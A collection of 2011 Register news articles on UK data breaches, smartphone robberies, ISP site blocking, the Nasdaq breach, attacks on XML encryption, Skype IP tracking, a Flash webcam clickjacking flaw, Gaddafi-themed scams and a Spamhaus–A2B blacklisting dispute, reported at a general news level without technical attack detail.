STE WILLIAMS

Data security breaches within the private sector are rapidly increasing, the UK’s Information Commissioner warned today.

Information Commissioner Christopher Graham said that the number of such violations reported to the ICO was up 58 per cent so far in 2011/12, compared with the same period last year.

The watchdog revealed those findings following a survey of 2,500 UK-based individuals and 800 businesses.

A disconnect between the private sector’s greater understanding of its data protection responsibilities and a drop in public confidence of the handling of such information was unsurprisingly uncovered in the survey.

“I’m encouraged that the private sector is waking up to its data protection responsibilities, with unprompted awareness of the [Data Protection] Act’s principles higher than ever,” said Graham.

“However, the sector does not seem to be putting its knowledge to good use. The fact is that security breaches in the private sector are on the rise, and public confidence in good information handling is declining.”

He reminded businesses that a fine of up to £500,000 could be slapped on companies that fail to comply with the Data Protection Act.

Graham also pointed out that a brand’s reputation could be damaged “when data is not handled properly”.

The ICO, in its report, pinpointed web-based outfits where public concern about personal data was at its highest. It said “almost three-quarters of individuals believe that online companies are not keeping their details secure”. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/ico_public_secotr_data_breaches/

The Association of Chief Police Officers (ACPO) reckons demand for smartphones on the black market has in part fuelled a rise in knife robberies.

According to a study of crime reports in the UK, police forces in England and Wales recorded nearly 15,000 robberies at knifepoint in the year to June, up 7 per cent on the previous year, as total crime levels fell 4 per cent to 4.1 million incidents.

The numbers were broken down by the Home Office yesterday, showing that 29 per cent of all thefts reported involved mobile handsets, up from, er, 28 per cent in the previous 12 months.

But just 3 per cent of theft was related to computers or other electrical goods, down from five per cent to June 2010.

“The increase in robbery and robbery with knives is a cause for concern,” said Merseyside chief constable Jon Murphy. “We believe this is in part driven by demand for mobile phone handsets, which can fetch more than double their worth on the black market abroad.”

“Worryingly, a large pro­portion of phone owners still do not have passcodes on their phones, leaving them vulnerable to possible ID theft and fraud,” he added.

Recent research by paper-shredding equipment supplier Fellowes states that 7 per cent of Britons, four million folk, had been victims of identity fraud at some point.

Fraud prevention service CIFAS claimed that 80,000 people have been targets this year, with ID theft costing on average £1,190 – though in severe cases it had risen to £9,000.

Action Fraud, the national fraud reporting and advice centre, estimated that £245,000 worth of loss in September was due to ID theft.

Jamey Johnson, head of Action Fraud, said: “It is important to report a loss to Action Fraud, but it is more important to protect yourself from it happening in the first place. Limiting access to your personal information is the key to safety from ID fraud.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/knife_crime_smartphones/

“Communications systems are inherently designed to deliver communication,” stated Mita Mitra, BT’s Internet Policy overseer, yesterday while debating one of the most controversial aspects of the 2010 Digital Economy Act: that BT and other ISPs should be responsible for blocking websites that infringe copyright.

“It’s a big thing, technically, philosophically, for us to stop people accessing sites… it’s quite a significant engineering and technical issue to focus your efforts on effective blocking,” said Mitra at the Westminster eForum on the Act yesterday.

BT and fellow internet service provider TalkTalk are dragging the Digital Economy Act through a judicial review in an attempt to delay its implementation. The case continues but while criticism has been heavy, and the government seems to have reneged on URL blocking but is seeking alternatives.

Mitra also stated that stopping casual copyright infringers and hardcore infringers required quite different approaches: “There’s a difference between building stops in a system for those who are deliberate compared to those who didn’t realise that they were going to do it.”

Blocking aside, she also argued that it was very difficult for ISPs to judge whether copyright really had been infringed or not – stating BT’s view that that was a matter for judiciary not a telecoms company.

And, she stressed, all this faffing around with blocking would take up a lot of money and time for ISPs resulting in a price hike for normal, non-piratey broadband customers.

Wrong tool for the job

Other objections to website blocking, raised by Consumer Focus policy advisor Saskia Walzel and other speakers, included the contention that blocking is a crude tool that could take down innocent websites and didn’t always catch offenders. Walzel stated that not only would blocking push up prices for consumers, but that it would degrade the network as well as a technical side-effect – giving them a worse service.

And LSE academic Dr Bingchun Meng used the example of the Great Firewall in China to suggest that site blocking would likely spark a technical “arms race” as determined pirates or copyright infringers would quickly start to use other technologies to circumvent bans – such as VPN networks. The battle with the hardcore infringers would only escalate as the ISPs would have to find new technologies to combat the new technologies of the pirates.

The Ofcom chief responsible for Internet policy, Campbell Cowie, explained that they had reached a similar conclusion. The answer to preventing online copyright infringement had to come from a behaviour change rather than a technical solution:

It’s not about about technology, technology can always be circumvented. It’s about incentives, we put the technologists back in the box, and started to look at why people do it. It’s about how you change the incentive structure, it’s not a technological thing.

There were several dissenting voices.

An audience member from Warner Brothers argued that just because it was hard to enforce the law didn’t mean you shouldn’t try to enforce it. And a partner in law firm Wiggin, which is representing film industry in a case against subscription download site NewsBinz, said that the responsibility did lie with ISPs because they were best placed to enforce the blocks. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/website_blocking/

The same hackers who cracked into Nasdaq’s computer systems last year apparently planted malware that allowed them to spy on publicly traded companies.

The stock exchange previously said neither its trading systems nor its customer data were exposed by an attack that focused on a web-based app called Directors Desk. However an investigation into the breach, involving the FBI and National Security Agency, has found evidence that the hackers extracted confidential data via Directors Desk, including confidential documents and the communications of board directors shared using the system.

Tom Kellermann, chief technology officer at security tools firm AirPatrol, told Reuters that hackers had spied on “scores” of directors who used directorsdesk.com before backdoor spyware was found and removed. The breach was detected in October. It’s still unclear how long Nasdaq’s system was comprised prior to this.

Nasdaq chief Robert Greifeld said the exchange spends nearly $1bn a year defending itself against constant hacking attacks. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/nasdaq_hackers_malware_plot_uncovered/

German computer scientists have cracked components of an encryption system used to securely exchange data between e-commerce and banking systems.

Boffins from the Ruhr University of Bochum (RUB) have devised a technique partly based on analysing error messages returned when carefully modified cipher text is submitted to a web service. By analysing the results of a sequence of error messages it is possible to decrypt encrypted XML-based data elements, H Security reports.

The official W3C XML encryption specification is designed to allow the secure transmission of information between different e-commerce and financial systems. The attack is limited to where AES is used for encryption in the cipher-block chaining (CBC) mode; other techniques, such as using an RSA key and X.509 certificates, are not susceptible.

The cryptoboffins argue their research shows the standard is insecure and needs to be updated. The researchers, Juraj Somorovsky and Tibor Jager, plan to present their research at the ACM Conference on Computer and Communications Security (ACM CCS 2011) in Chicago.

IBM, Microsoft, and Red Hat Linux use the technology for various web services applications. Each has been notified by the RUB team of its findings (summarised in German here). ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/xml_crypto_cracked/

News Corp has agreed to cough up £2m to the family of Milly Dowler after individuals working for the now-defunct Sunday tabloid the News of the World were found to have hacked into the murdered schoolgirl’s phone.

News International, owned by Rupert Murdoch’s News Corp, confirmed the settlement in a joint statement with the Dowler family.

Additionally, Murdoch has agreed to donate £1m to a variety of charities selected by the Dowlers.

“The behavior that the News of the World exhibited towards the Dowlers was abhorrent and I hope this donation underscores my regret for the company’s role in this awful event,” said the media tycoon, whose empire has been rocked by the scandal.

The 168-year-old NotW was dramatically axed in July this year, after evidence showed that reporters had accessed Milly Dowler’s voicemail following her disappearance in 2002.

“Nothing that has been agreed will ever bring back Milly or undo the traumas of her disappearance and the horrendous murder trial earlier this year,” the Dowler family said in a statement.

“The only way that a fitting tribute could be agreed was to ensure that a very substantial donation to charity was made in Milly’s memory. We hope that projects will be undertaken so that some good can come from this.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/milly_dowler_family_settlement/

Scientists have devised a stealthy and low-cost way to track the internet protocol addresses of tens of thousands of Skype users, and link the information to their online activities such as the sharing of specific files over BitTorrent.

The method, which is laid out in a recently published academic paper, works even when Skype users have configured their accounts to accept calls only from people in their contact lists. It also works against Skype users who aren’t currently logged in, as long as they’ve used the VoIP program in the past three days. The system is able to link an individual Skype user to specific BitTorrent activity, even when they share the IP address with others over a local area network that uses NAT, or network address translation.

“We have shown that it is possible for an attacker, with modest resources, to determine the current IP address of identified and targeted Skype user[s] (if the user is currently active),” the 14-page paper stated. “In the case of Skype, even if the targeted user is behind a NAT, the attacker can determine the user’s public IP address. Such an attack could be used for many malicious purposes, including observing a person’s mobility or linking the identity of a person to his internet usage.”

The scientists found that it was relatively easy to find the ID of most Skype users when their email address and birth name are known to the attacker. Additional information, such as the target’s city of residence, sex, or age, brought greater accuracy to the task.

They then called the target’s Skype account using a customized system that sent specially crafted packets. By examining the headers of the data that was returned, they had no trouble determining the person’s IP address. Because the scientists prevented a TCP, or transmission control protocol, connection from being fully established during the probing, targets had no idea their Skype accounts were being tracked. The scientists devised the system so that it could track 10,000 people for about $500 per week.

After learning the IP addresses of individuals, the scientists tapped BitTorrent sites to track the specific downloads of addresses in their database. Even when one of the IP addresses was shared among many users on a single network, the method was able to single link a unique Skype user to a specific download by, among other things, collecting identifiers known as infohashes from BitTorrent networks.

The scientists said Google Talk, MSN Live and other real-time communication applications may also be susceptible to the technique, but they singled Skype out for containing what they called “a major privacy vulnerability.”

In a statement, Adrian Asher, chief information security officer in Microsoft’s Skype division, said: “We value the privacy of our users and are committed to making our products as secure as possible. Just as with typical internet communications software, Skype users who are connected may be able to determine each other’s IP address. Through research and development, we will continue to make advances in this area and improvements to our software.”

The research paper, which is titled I Know Where You are and What You are Sharing, made several recommendations for improving Skype’s ability to conceal the identity of its users.

“One solution that would go a long way is to design the VoIP system so that the callee’s IP address is not revealed until the user accepts the call,” it stated. “With this property, Alice would not be able to inconspicuously call Bob. Moreover, if Alice is a stranger (that is, not on Bob’s contact list), and Bob configures his client to not accept calls from strangers, then this design would prevent any stranger from tracking him, conspicuously or otherwise.”

A PDF of the paper is here. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/21/skype_bittorrent_stalking/

Updated Engineers on Thursday patched a hole in Adobe’s ubiquitous Flash Player that allowed website operators to silently eavesdrop on visitors’ webcam and microphone feeds without permission.

To be attacked, visitors needed to do no more than visit a malicious website and click on a handful of buttons like the ones in this live demonstration. Without warning, the visitor’s camera and microphone were activated and the video and audio intercepted. The attack closely resembled a separate Flash-based attack on webcams from 2008 using a class of exploit known as clickjacking.

Adobe said on Thursday it was planning to fix the vulnerability, which stems from flaws in the Flash Player Settings Manager. The panel, which is used to designate which sites may access feeds from an enduser’s camera and mic, is delivered in the SWF format used by Flash. Feross Aboukhadijeh, a computer science student at Stanford University, discovered he could embed the SWF file as an invisible iframe and superimpose misleading graphics on top that tricked visitors into making changes to the underlying privacy settings.

“I’ve seen a bunch of clickjacking attacks in the wild, but I’ve never seen any attacks where the attacker iframes a SWF file from a remote domain to clickjack it – let along a SWF file as important as one that controls access to your webcam and mic!” Aboukhadijeh wrote in a blog post.

Because the settings manager is hosted on Adobe servers, engineers were able to close the hole without updating enduser software, company spokeswoman Wiebke Lips said. The change was pushed out early in the afternoon on Thursday, two days after Aboukhadijeh published his findings.

Shortly after security researchers Jeremiah Grossman and Robert “RSnake” Hansen documented clickjacking in 2008, Adobe patched Flash to blunt attacks that exploited the program to surreptitiously spy on the millions of people who use it. Engineers closed the hole by changing the behavior of Flash security dialog box when it’s set to be transparent.

Aboukhadijeh was able to revive the attack by exploiting the settings manager, which until Thursday’s fix, still allowed important settings to be made while it was in transparent mode.

He said his demonstration worked only against Macs when using Firefox or Safari, and that a CSS opacity bug prevented it from working on other operating systems and browsers. It wouldn’t have been surprising if additional research uncovered ways to make the attack more universal.

Aboukhadijeh went on to say he went public after reporting the vulnerability to Adobe and getting no reply.

“It’s been a few weeks and I haven’t heard anything from Adobe yet,” he said. “I think it’s worth sharing it with the world now, so that Adobe pays attention and fixes it more quickly.” ®

This article was updated throughout to reflect that Adobe has issued a patch.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/20/acobe_flash_webcam_spying/

Early reports that deposed Libyan dictator Muammar Gaddafi may have died after being injured during the fall of his home town of Sirte are likely to become a theme of cybercrime attacks, if past experience is anything to go by.

The execution of Saddam Hussein in 2005 as well as the supposed capture of Osama Bin Laden later the same year, six years before his actual assassination, were both accompanied by spam emails falsely offering “death pictures” in attachments. The attachments had actually been loaded in malware. Scams along the same lines but featuring supposed images of Gaddafi are almost inevitable.

Other scams likely to rear their head include attempts to poison search results for terms related to Gaddafi’s demise so that sites punting scareware scams appear prominently in search results. Such blackhat search engine manipulation attacks also follow in the wake of natural disasters. At least in the case of Gaddafi, fake donation website scams are unlikely to appear and still less likely to pull in any victims.

Fake supposed photo sets of Gaddafi are also likely to appear on Facebook, as a lure designed to con marks into completing time-wasting surveys and perhaps to further trick them into signing up to useless premium rate text messaging services.

Finally, 419 advance fee frauds featuring rewards beyond the dreams of avarice in exchange for help in siphoning Gaddafi’s millions out of Libya or from banks in third-party countries are another possibility.

Let’s be careful out there. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/20/gaddafi_scams/

Analysis Spamhaus and a Dutch ISP that was temporarily slapped on the anti-spam organisation’s blacklist continue to be at loggerheads – even after the service provider was removed from the list.

The row between A2B and Spamhaus came after the Dutch ISP allegedly provided connectivity services to CB3ROB (AKA Cyberbunker), an outfit long identified by Spamhaus as a rogue host and included on its Spamhaus Block List (SBL) – which is used by email providers to weed out spam.

Cyberbunker offers anonymous hosting of anything “except child porn and anything related to terrorism”, as its terms and conditions proudly proclaim. This almost ‘anything goes’ classification means spam, phishing site and malware hosting is tolerated.

According to Spamhaus, Cyberbunker has long been a haven for cybercrime and spam. Cyberbunker itself does not respond to complaints. Spamhaus deals with this common situation by adding rogue hosts to its SBL and contacting upstream providers to encourage them to kick bad actors off their network.

After notifying A2B several times about Cyberbunker since June without results, one of A2B’s IP ranges was added to the Spamhaus Block List’s “providing a spam support service” category. Until Spamhaus finally escalated the SBL listing on 6 October, A2B Internet was also providing connectivity to a Chinese-based rogue host, whose businesses include selling counterfeit watches advertised via spam, according to Spamhaus.

The Spamhaus Project tracks email spammers and spam-related activity. It supplies DNS-based block lists that are used by many ISPs to block traffic from known spammers. A2B was placed on this list for around two days until it stopped handling traffic for Cyberbunker, which is still online but connected via anther provider.

Under pressure

A2B responded to the blacklisting by accusing Spamhaus of acting as internet vigilantes and complaining to the police over alleged extortion. It accuses Spamhaus of placing “disproportionate pressure … upon us to stop routing for a network without legal cause or reason”. It further argues Spamhaus should take up any problem it has with Cyberbunker directly or with the police, not upstream providers.

“The thing is that we are a LIR (Legal Internet Registrant) and we provide transit to other LIRs and ISPs,” Erik Bais, a director at A2B Internet told El Reg.

“If Spamhaus is having an issue with something that CB3ROB is doing, they can either take it up with them or if they don’t want to, take it up with the police.

“We have acted on the provided abuse message after pushing Spamhaus to provide it, and when they stated that blocking one IP address was not enough and they wanted to see CB3ROB completely removed from our network, it shows exactly how detached from reality they are.

“CB3ROB isn’t even a customer of ours, but is rather a customer of Datahouse (who also has their own network and IP addresses) and to move up two ISPs and start complaining there is just insane. On top of that, putting the IPs of that ISP on a blacklist to “make your point” is something I don’t have a good word for.”

Black sheep

Steve Linford, the Spamhaus founder, defended the blacklisting. “We do not need to ‘take it up with the police’ every time we encounter a rogue host or spam host, we very simply add them to the SBL,” Linford told El Reg. “That is what the SBL is for.

“All of CB3ROB has been on the SBL for some time. There has not been a single complaint from any CB3ROB customer about it, because there are no CB3ROB customers that wish to show their heads above ground to complain,” he added.

Linford claimed Bais runs Datahouse, so attempts to push the issue off to that ISP are disingenuous.

Bais countered that Datahouse has outsourced the management of its network to A2B but said that he wasn’t employed by Datahouse.

According to Bais, the blacklisting of a range (but not all) of A2B’s internet addresses meant that a number of the ISP’s customers, including a high street retail chain, were left unable to send email. He compared this to the BlackBerry outage last week.

It is this collateral damage that prompted Bais to file a police complaint against Spamhaus. “I don’t want to put Spamhaus out of business or sue it for money but I do want it to change its policies, which are unjust,” Bais said. “They are listing innocent addresses that not involved in spamming. What Spamhaus did felt like extortion. A denial of email service.”

Bais also disputed Spamhaus’s assessment that Cyberbunker is a haven for cybercrime, arguing that it is Chinese-based customers peddling replicas and torrent tracker services, rather anything more unsavoury, that have led to the complaints Spamhaus is pursuing. He claimed that Cyberbunker would respond to requests to take down botnet command-and-control hubs, for example, and would “look at a valid complaint”.

Linford argued that A2B’s claims on the effect of the temporary blacklisting applied by Spamhaus are exaggerated.

“There was only ever one of A2B’s many IP ranges on the SBL, back on October 6, it was 178.249.152.0/21 and it was only on the SBL for 48 hours. To enlarge his story A2B has been saying that ‘all’ of A2B was on the SBL, which is a lie,” Linford said.

“So the current status is that A2B has no SBL listings, the one they had on October 6 lasted only 48 hours and was only a small part of their IP range – not the ‘all of A2B’ Erik Bais says.

“CB3ROB is still on the SBL and will remain on the SBL for the foreseeable future until we are convinced it would not pose a threat to SBL users to remove it,” Linford added.

Bais told El Reg that it had received messages of support from several other ISPs since complaining to Dutch police about Spamhaus. He didn’t say how many ISPs had come out in support of A2B’s stance but suggested that police complaints against Spamhaus by ISPs in the UK and Switzerland may follow.

Out of line

Linford said most ISPs co-operated with Spamhaus and had no problem with its methods. “We always ask upstreams to stop giving transit to rogue hosts once the host is completely SBL’d. All transit providers have Terms of Service which forbid spam and malware from a downstream and require downstreams to handle complaints promptly. A2B is the only transit provider we know of that also doesn’t care what his downstream does.”

Bais said A2B had a “very strict” abuse policy, pointing to favourable listings by independent third-party services to this effect (here and here).

But what about the Dutch police complaint by A2B?

Spamhaus, at least, is confident nothing will come of it. “As was to be expected, we have not heard a peep from any police about the complaint A2B says it filed,” he told El Reg.

Both parties have published their radically different take on ongoing events here and here. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/10/20/spamhaus_a2b_row/